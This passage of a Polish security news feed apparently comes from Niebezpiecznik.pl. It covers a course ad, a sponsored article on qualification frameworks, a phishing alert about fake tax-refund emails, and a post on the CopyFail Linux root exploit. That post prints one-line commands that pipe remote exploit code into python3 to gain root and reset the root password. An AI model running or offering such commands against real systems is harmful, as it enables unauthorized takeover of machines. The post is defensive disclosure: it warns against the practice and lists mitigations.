<p>To szkolenie jest wyjątkowe, bo prowadzi je aż 3 topowych ekspertów. Doskonale znany Wam z wielu naszych szkoleń <strong>adwokat Michał Kluska</strong> (jeden z niewielu w Polsce prawników, którzy naprawdę mocno ogarniają cyberbezpiezeństwo), <strong>Marcin Maj</strong> (audytor wiodący SZBI 27001, trener security awareness i redaktor Niebezpiecznik.pl, który jako jeden z pierwszych w Polsce kompleksowo zajmował się tematem nowelizacji KSC i NIS2 i już dwa lata temu opisywał te kwestie na Niebezpieczniku) oraz <strong>Piotr Konieczny</strong> (założyciel Niebezpiecznika który od 20 lat doradza zarządom w tematach dotyczących cyberbezpieczeństwa). </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-600x206.jpg" alt="" width="600" height="206" class="aligncenter size-large wp-image-27069" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-600x206.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-350x120.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-768x264.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-1536x527.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/trenerzy-nis2-ksc-ksc2-2048x703.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Taka ekipa trenerska to gwarancja, że temat NIS2 i KSC zaadresujemy kompleksowo, z 3 unikatowych perspektyw: <strong>prawnej, audytowo-procesowej i technicznej</strong> (ale wciąż przystępnym dla każdego językiem). </p>
<h3>Chcę wiedzieć jak wdrożyć NIS2/KSC w organizacji — co robić, jak żyć?</h3>
<p>Zapisz się na nasze szkolenie <a href="https://sklep.niebezpiecznik.pl/opis/37" target="_blank">NIS2 i KSC: wszystko co musisz wiedzieć (szkolenie nie tylko dla Zarządów)</a>, które odbędzie się <strong>13 maja 2026 o godz. 14:00 online</strong> — zapisz się, nawet jeśli ten termin Ci nie pasuje, bo szkolenie jest nagrywane i będziesz mieć do niego dostęp przez rok, a <strong>tylko do środy sprzedajemy je aż 60% taniej</strong>! Później cena drastycznie wzrośnie.</p>
<p><a href="https://sklep.niebezpiecznik.pl/opis/37"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-600x156.png" alt="" width="600" height="156" class="aligncenter size-large wp-image-27068" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-600x156.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-350x91.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie-768x200.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/nis2-ksc2-szkolenie.png 1238w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/nis2-ksc-szkolenie-zarzad-krajowy-system-cyberbezpieczenstwa-szkolenia/#comments" rel="replies" thr:count="1" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/nis2-ksc-szkolenie-zarzad-krajowy-system-cyberbezpieczenstwa-szkolenia/feed/atom/" rel="replies" thr:count="1" type="application/atom+xml"/>
			<thr:total>1</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Nowoczesne kadry w dobie cyfrowej transformacji]]></title>
		<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27018</id>
		<updated>2026-04-30T12:25:53Z</updated>
		<published>2026-04-30T12:25:53Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Gwałtowny rozwój technologii, ze szczególnym uwzględnieniem sztucznej inteligencji (AI), stanowi przełom dla wielu profesji. Ale to tylko jeden z powodów głębokich transformacji zachodzących w strukturze kadr sektorów IT, telekomunikacji czy cyberbezpieczeństwa. Na tempo tych procesów rzutuje dziś także niestabilna sytuacja geopolityczna. Sektor ICT mierzy się z eskalacją liczby cyberataków oraz ich rosnącą różnorodnością. Taka dynamika [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/"><![CDATA[<p class="p5"><span class="s1">Gwałtowny rozwój technologii, ze szczególnym uwzględnieniem sztucznej inteligencji (AI), stanowi przełom dla wielu profesji. Ale to tylko jeden z powodów głębokich transformacji zachodzących w strukturze kadr sektorów IT, telekomunikacji czy cyberbezpieczeństwa. Na tempo tych procesów rzutuje dziś także niestabilna sytuacja geopolityczna. Sektor ICT mierzy się z eskalacją liczby cyberataków oraz ich rosnącą różnorodnością. Taka dynamika wymusza na organizacjach stałe podnoszenie kompetencji obecnych pracowników oraz intensywne pozyskiwanie nowych specjalistów.  Jak z głową &#8220;przekwalifikować się&#8221; na inne stanowisko &#8212; i które konkretnie? W kogo pracodawca powinien dziś inwestować? Tego dowiecie się z poniższego artykułu.</span></p>
<p class="p5"><span id="more-27018"></span></p>
<h3 class="p6"><b>Sektorowe Ramy Kwalifikacji – „branża dla branży&#8221; </b></h3>
<p class="p7"><strong>Sektorowe Ramy Kwalifikacji</strong> (SRK IT, SRK CYBER oraz SRK TELE) to narzędzia opracowane w ramach wspierania rozwoju <strong>Zintegrowanego Systemu Kwalifikacji</strong> (ZSK), przygotowane w <a href="https://ibe.edu.pl/pl/"><span class="s2">Instytucie Badań Edukacyjnych – Państwowym Instytucie Badawczym</span></a> przez zespół ekspertów zgodnie z ideą „branża dla branży&#8221;.</p>
<p class="p7">SRK zawierają uporządkowane opisy specyficznych dla tych branż kompetencji ujętych w kategoriach: wiedza, umiejętności i kompetencje społeczne. SRK stanowią bezpośrednie rozwinięcie <strong>Polskiej Ramy Kwalifikacji</strong> (PRK) poprzez adaptowanie ogólnych standardów do specyficznych realiów rynkowych. Dzięki stopniowaniu kompetencji na poszczególnych poziomach można planować rozwój zawodowy w danym obszarze sektora.</p>
<ul class="ul1">
<li class="li7"><a href="https://kwalifikacje.edu.pl/sektorowa-rama-kwalifikacji-dla-cyberbezpieczenstwa-srk-cyber/"><span class="s2"><b>SRK CYBER</b></span></a> (2024): Nowo opublikowana rama będąca bezpośrednią odpowiedzią na zapotrzebowanie rynku w obszarze bezpieczeństwa cyfrowego.</li>
<li class="li7"><b>SRK IT</b>: Aktualizacja wersji z 2015 r. Dekadę temu sektor IT postrzegano głównie jako wsparcie biznesu, dlatego konieczna była zmiana definicji sektora, ale także uwzględnienie nowych rozwiązań technologicznych, „zielonych kompetencji&#8221; i dodanie rozbudowanego słownika zawierającego niemal 400 definicji pojęć.</li>
<li class="li5"><b>SRK TEL</b><strong>E</strong>: Aktualizacja wersji z 2015 r. z podobnymi zmianami jak w SRK IT, dodatkowo wyraźnie zaznaczono linię podziału między obszarami takimi jak infrastruktura pasywna i aktywna oraz detaliczne i hurtowe usługi telekomunikacyjne.</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk.jpg"><img decoding="async" class="aligncenter size-large wp-image-27019" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-600x188.jpg" alt="" width="300" height="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-600x188.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-350x110.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-768x241.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk.jpg 1178w" sizes="(max-width: 600px) 100vw, 600px" /></a></p>
<p>&nbsp;</p>
<h3 class="p8"><b>Kto najbardziej skorzysta z SRK IT, SRK CYBER i SRK TELE?</b></h3>
<p class="p7">Omawiane Sektorowe Ramy Kwalifikacji uwzględniają specyfikę poszczególnych sektorów, aktualne trendy i kierunki rozwoju, dlatego są szczególnie użyteczne dla <strong>pracodawców</strong>. Zyskują oni wsparcie w analizie luk kompetencyjnych, <strong>planowaniu ścieżek rozwoju pracowników</strong>, tworzeniu siatki płac oraz w procesach rekrutacyjnych.</p>
<p class="p9">Z kolei pracownicy dzięki SRK mogą świadomie projektować swoją karierę, samodzielnie wyznaczając cele w zakresie samokształcenia i rozwoju zawodowego.</p>
<p class="p10">SRK są również przydatne w obszarze <strong>edukacji i szkoleń</strong>. Uczelnie, szkoły i placówki oświatowe mogą dostosowywać realizowane programy nauczania do aktualnych i realnych potrzeb rynku pracy. Firmy szkoleniowe mogą skuteczniej projektować specjalistyczne szkolenia, szyte na miarę potrzeb i oczekiwań swoich klientów.</p>
<h3 class="p11"><b>Zintegrowany System Kwalifikacji </b></h3>
<p class="p9">U podstaw ZSK leży idea uczenia się przez całe życie – kompetencje można potwierdzać nie tylko poprzez edukację formalną, ale także dzięki doświadczeniu zawodowemu czy nauce własnej. Kwalifikacje uzyskane w drodze walidacji (sprawdzenia efektów uczenia się) są zintegrowane w portalu <a href="http://kwalifikacje.gov.pl"><span class="s2"><b>kwalifikacje.gov.pl</b></span></a>. W samym obszarze „<strong>Technologie cyfrowe –<span class="Apple-converted-space">  </span>IT</strong>&#8221; w Zintegrowanym Rejestrze Kwalifikacji znajdują się obecnie <strong>1462 kwalifikacje</strong>, w tym 33 wolnorynkowe, zgłoszone bezpośrednio przez firmy (np. „Modelowanie i skanowanie 3D&#8221;, „Zarządzanie cyberbezpieczeństwem&#8221;).</p>
<p class="p10">Podmioty branżowe mogą aktywnie współtworzyć ten system, zgłaszając propozycje nowych kwalifikacji, prowadząc procesy walidacji i certyfikacji czy uczestnicząc w pracach eksperckich. Warto wykorzystać te narzędzia, aby nadać swojej firmie kluczową rolę w sektorze.</p>
<h3 class="p11"><b>Więcej informacji:</b></h3>
<ul class="ul1">
<li class="li12"><span class="s4"><b>O ZSK i ZRK</b>:<a href="https://kwalifikacje.gov.pl/"><span class="s2"> https://kwalifikacje.gov.pl/</span></a></span></li>
<li class="li13"><a href="https://kwalifikacje.edu.pl/sektorowa-rama-kwalifikacji-dla-cyberbezpieczenstwa-srk-cyber/"><span class="s5">SRK CYBER</span></a><span class="s1">, zaktualizowane SRK IT i SRK TELE dostępne wkrótce na portalu ZSK</span></li>
</ul>
<p class="p9"><em>Artykuł przygotowany w ramach projektu „Wspieranie dalszego rozwoju Zintegrowanego Systemu Kwalifikacji w Polsce (ZSK6)” (FERS.01.08-IP.05-0001/23) z dofinansowaniem z Funduszy Europejskich dla Rozwoju Społecznego. Jego autorem jest <a href="https://ibe.edu.pl">Instytut Badań Edukacyjnych</a> <span class="s6">–</span> Państwowy Instytut Badawczy. Za jego publikację otrzymaliśmy wynagrodzenie.</em></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-600x117.jpg" alt="" width="600" height="117" class="aligncenter size-large wp-image-27033" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-600x117.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-350x69.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-768x150.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-1536x301.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu.jpg 1594w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Masz Linuksa? To go szybko załataj!]]></title>
		<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27062</id>
		<updated>2026-04-30T12:23:09Z</updated>
		<published>2026-04-30T07:21:36Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="CopyFail"/><category scheme="https://niebezpiecznik.pl" term="CVE-2026-31431"/><category scheme="https://niebezpiecznik.pl" term="Linux"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Ujawniono atak na wszystkie Linuksy wydane po 2017 roku. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu prawa roota. Szczęście w nieszczęściu: ta podatność to Local a nie Remote Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/copyfail-linux-exploit/"><![CDATA[<p>Ujawniono atak na <strong>wszystkie Linuksy wydane po 2017 roku</strong>. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu <strong>prawa roota</strong>. Szczęście w nieszczęściu: ta podatność to <strong>Local</strong> a nie <strong>Remote</strong> Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są kontenery.<span id="more-27062"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-600x357.jpg" alt="" width="600" height="357" class="aligncenter size-large wp-image-27063" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-600x357.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-350x209.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-768x458.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail.jpg 1410w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak sprawdzić, czy jesteś podatny?</h3>
<p>Aby zweryfikować, czy Twój system jest podatny, wystarczy uruchomić <a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" target="_blank">ten 732 bajtowy skrypt Pythona</a>. Na szybko można wykonać poniższe polecenie &#8212; po prostu skopiuj je i przeklej do terminala z poziomu zwykłego użytkownika. Jeśli po jego uruchomieniu zobaczysz <span class="code">uid=0(root)</span> i zostaniesz rootem, to jesteś podatny na atak:</p>
<p><code>curl https://copy.fail/exp | python3 && su</code></p>
<p>Skopiowałeś i przekleiłeś bez sprawdzenia co jest pod URL-em? <strong>Błąd</strong>. Nigdy tego nie rób! &#8220;Pajpowanie&#8221; kodu z internetu do shella to proszenie się o kłopoty. I nie &#8212; wejście przeglądarką na URL i sprawdzenie kodu nie wystarczy, bo złośliwa strona może serwować Twojej przeglądarce co innego niż curlowi pod tym samym adresem (tzw. User-Agent cloaking). Poprawne zachowanie to lektura wyświetlonego kodu pod kątem złośliwych instrukcji (jeśli sam nie potrafisz tego ocenić, poproś o pomoc swojego asystenta AI) a potem skopiowanie kodu do lokalnego pliku i dopiero wtedy jego uruchomienie w interpreterze Pythona.  </p>
<p>Na marginesie, jeśli chcesz nauczyć się testować swoje środowiska pod kątem różnych podatności, dziur i ataków, to wpadnij na nasze bestsellerowe, szkolenie z testów penetracyjnych pt. <a href="https://niebezpiecznik.pl/net">Bezpieczeństwa Sieci i Systemów Komputerowych</a>. Przez 3 dni hakujemy tam na różne sposoby różne maszynki, pokazujemy techniki i narzędzia, dzięki którym jesteś w stanie sprawdzić swoje środowisko pod kątem różnych ataków i w konsekwencji znacznie podnieść jego bezpieczeństwo. To szkolenie to bardziej warsztaty, bo realizujemy je w duchu minimum teorii, maksimum praktyki. Oto jego najbliższe terminy:</p>
<div class="info"><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>5 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 12 maja 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 22 maja)<br>
                        4444 PLN netto (od 23 maja)
                        </ul></div></div>
<h3>Dlaczego ten atak jest możliwy i dlaczego jest tak istotny?</h3>
<p>Luka jest wynikiem błędu logicznego w kodzie kryptograficznym jądra (uwierzytelnianie przez AF_ALG i splice()), który umożliwia niewielkie zapisy w pamięci podręcznej stron (page cache), co może naruszyć integralność binarek setuid, takich jak /usr/bin/su.</p>
<p>A teraz po polsku :) Praktycznie każdy Linuks wydany po 2017 roku jest podatny. <strong>Skutki tej dziury mogą być dramatyczne na środowiskach współdzielonych</strong>, czyli hostingach i serwerach z Kubernetes, procesami CI czy nawet w różnego rodzaju sandboxach, bo błąd może pozwolić na <strong>ucieczkę z kontenera i przejęcie systemu hosta</strong> przez użytkownika (tenanta).</p>
<p>Tą podatność / atak nazwano <span class="code">CopyFail (CVE-2026-31431)</span>. Patche są już w mainline kernela (a664bf3d603d) od 1 kwietnia. Co ciekawe, ta luka została <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank">wykryta</a> przez skaner &#8220;dopalony&#8221; AI.</p>
<h3>Są plusy tego ataku&#8230;</h3>
<p>Jeśli masz maszynkę, do której zapomniałeś hasła roota, to teraz masz szansę je sobie nie tyle przypomnieć, co zmienić na dowolne :-) Po prostu zhackuj swojego Linuksa tym atakiem używając tego polecenia:</p>
<p><code>$ curl https://copy.fail/pw | TARGET_USER=root python3 | su</code></p>
<p>I błagamy, daj znać, że drugi raz nie zrobiłeś pajpa do pythona bez czytania tego, na co kierujesz curla.</p>
<h3>Mam Linuksa &#8212; co robić, jak żyć?</h3>
<p>Jeśli uruchomiłeś powyższy skrypt Pythona i zobaczyłeś <strong>uid=0(root)</strong> to jesteś podatny. W pierwszej kolejności zaktualizuj kernel do mainline <strong>a664bf3d603d</strong>. Jeśli nie możesz wgrać aktualizacji, to wyłącz moduł <span class="code">algif_aead</span> wykonując następujące polecenia:<br />
<code>echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf<br />
rmmod algif_aead 2>/dev/null || true</code></p>
<p>I na koniec, jeszcze raz zapraszamy wszystkich adminów do udziału w naszym szkoleniu z <a href="https://niebezpiecznik.pl/net" target="_blank">Bezpieczeństwa Sieci Komputerowych</a> &#8212; tam nie tylko nauczycie się jak hakować Linuksy na różne sposoby, ale także dowiecie się, jakie zabezpieczenia można wdrożyć, aby nawet pojawienie się takich błędów jak CopyFail nie było problemem dla Waszej maszyny (albo było problemem zdecydowanie mniejszym).</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/#comments" rel="replies" thr:count="46" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/feed/atom/" rel="replies" thr:count="46" type="application/atom+xml"/>
			<thr:total>46</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#x26a0;&#xfe0f; Uwaga na fałszywe e-maile o zwrocie podatku!]]></title>
		<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27057</id>
		<updated>2026-04-29T08:47:13Z</updated>
		<published>2026-04-29T08:47:13Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="cyberalert"/><category scheme="https://niebezpiecznik.pl" term="Krajowa Administracja Skarbowa"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="puesc"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-1-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Otrzymujemy zgłoszenia dotyczące kampanii, w której przestępcy podszywając się pod pracowników Krajowej Administracji Skarbowej informują o przysługującym zwrocie podatku. Atak zaczyna się od e-maila, a kończy na stronie internetowej, gdzie ofiara, która uzupełni formularz, pieniądze straci, a nie odzyska. Wiele wariantów e-maila Poniżej podajemy przykładowe wartości dla pól nadawcy i tytułu: Od: puesc.mf.gov.pl (mail@deal.dk) Temat: WAŻNE: [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/"><![CDATA[<p>Otrzymujemy zgłoszenia dotyczące kampanii, w której przestępcy podszywając się pod pracowników Krajowej Administracji Skarbowej informują o przysługującym zwrocie podatku. Atak zaczyna się od e-maila, a kończy na stronie internetowej, gdzie ofiara, która uzupełni formularz, pieniądze straci, a nie odzyska.<span id="more-27057"></span></p>
<h3>Wiele wariantów e-maila</h3>
<p>Poniżej podajemy przykładowe wartości dla pól nadawcy i tytułu:</p>
<p><code>Od: puesc.mf.gov.pl (mail@deal.dk)<br />
Temat: WAŻNE: Środki czekają na Ciebie – działanie wymagane {Noreply} #644643435</p>
<p>Od: przelewy.puesc.gov.pl (noreply@jiotix.asia)<br />
Temat: PILNE: Zwrot podatku – ostatni krok {Noreply} #982617231</code></p>
<p>E-maile wyglądają bardzo profesjonalnie. Ich treść ma kilka wariantów, ale generalnie każdy z nich zachęca do kliknięcia w przycisk, aby rozpocząć procedurę zwrotu podatku, wskazując że ostateczny termin to 30 kwietnia. Mamy więc presję czasu:</p>
<blockquote><p>Potwierdzenie zwrotu nadpłaconego podatku dochodowego<br />
Szanowna Pani / Szanowny Panie,<br />
Na podstawie art. 72 § 1 Ordynacji podatkowej oraz po dokonaniu weryfikacji rocznego zeznania podatkowego PIT-37 za rok 2025, Krajowa Administracja Skarbowa stwierdza wystąpienie nadpłaty w podatku dochodowym od osób fizycznych. Kwota nadpłaty podlega zwrotowi na rachunek bankowy wskazany przez Podatnika, po uprzednim potwierdzeniu danych w systemie PUESC. Zgodnie z art. 77a ww. ustawy, zwrot nadpłaty zostanie zrealizowany w terminie 3 dni od dnia potwierdzenia rachunku. Poniżej przedstawiamy szczegóły obliczonej kwoty oraz niezbędne instrukcje.</p>
<p>Wysokość zwrotu należnego<br />
2210,25 zł słownie: dwa tysiące dwieście dziesięć złotych 25/100</p>
<p>Podstawa prawna zwrotu:<br />
&#8211; art. 75 § 1 oraz art. 77a ustawy z dnia 29 sierpnia 1997 r. Ordynacja podatkowa (t.j. Dz.U. z 2025 r. poz. 932).<br />
&#8211; rozporządzenie Ministra Finansów w sprawie zwrotu nadpłat podatkowych (Dz.U. z 2024 r. poz. 1582).</p>
<p>Zwrot pieniędzy teraz &#8212; Link prowadzi do bezpiecznego formularza w portalu PUESC. Termin potwierdzenia upływa 30 kwietnia 2026 r. UWAGA – termin zastrzeżony. Zgodnie z procedurami KAS, brak potwierdzenia danych rachunku bankowego w terminie do 30 kwietnia 2026 r. spowoduje zawieszenie wypłaty do czasu ponownej weryfikacji. Aby otrzymać środki w najbliższym terminie wypłat, prosimy o niezwłoczne działanie.</p></blockquote>
<p>Po kliknięciu w link, ofiara jest kierowana na strony pod różnymi domenami (wiele z nich nie jest wykrywanych jako złośliwe przez przeglądarki). Strony wyglądają wiarygodnie i wyłudzają dane osobowe: PESEL, nazwisko, adres, a następnie numer karty płatniczej. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-600x338.jpg" alt="" width="600" height="338" class="aligncenter size-large wp-image-27058" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-600x338.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-1536x864.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-2048x1152.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak jeszcze można wykryć, że to scam?</h3>
<p>Wykrycie, że ma się do czynienia z atakiem jest możliwe, jeśli stosuje się do następujących, dobrze znanych rad:</p>
<ul>
<li>Sprawdź dokładnie adres e-mail nadawcy. (tu żaden nie jest w domenie gov.pl)
<li>Nie podawaj numeru karty płatniczej, jeśli chcesz OTRZYMAĆ ZWROT pieniędzy. (podanie numeru karty, z niewielkimi wyjątkami, które można pominąć, służy do jej obciążenia)
</ul>
<h3>Otrzymałem taką wiadomość, co robić, jak żyć?</h3>
<p>Jeśli nie uzupełniłeś formularzy swoimi danymi osobowymi i nie podałeś numeru karty, możesz spać spokojnie.</p>
<p>Ze względu na skalę ataku, brak wykrywania stron jako złośliwe przez przeglądarki oraz zbliżający się termin rozliczeń podatkowych postanowiliśmy w tej kampanii wysłać ostrzeżenie użytkownikom naszej <a href="https://niebezpiecznik.pl/app" target="_blank">aplikacji CyberAlerty</a>. Aplikacja CyberAlerty jest darmowa i dostępna zarówno na Andoida jak i na iPhone. Nie wymaga rejestracji a jedyne co robi, to wysyła Ci ostrzeżenia przed atakami, jeśli zauważymy nowy, istotny i masowy atak, który może spowodować kradzież Twoich danych lub pieniędzy albo zagraża Twojej prywatności. Aplikację pobierzesz z oficjalnego sklepu <a href="https://niebezpiecznik.pl/app" target="_blank">Google</a> lub <a href="https://niebezpiecznik.pl/app" target="_blank">Apple</a>.</p>
<p><em>Dziękujemy wszystkim Czytelnikom, którzy przesłali nam informacje o tych złośliwych wiadomościach <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f9e1.png" alt="🧡" class="wp-smiley" style="height: 1em; max-height: 1em;" /> To dzięki Wam możemy ostrzegać innych! </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/#comments" rel="replies" thr:count="5" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/feed/atom/" rel="replies" thr:count="5" type="application/atom+xml"/>
			<thr:total>5</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Nadanie paczki przez InPost Mobile. Jak zrobić to wygodnie i bezpiecznie?]]></title>
		<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27040</id>
		<updated>2026-04-28T11:06:48Z</updated>
		<published>2026-04-28T11:06:48Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="InPost"/>
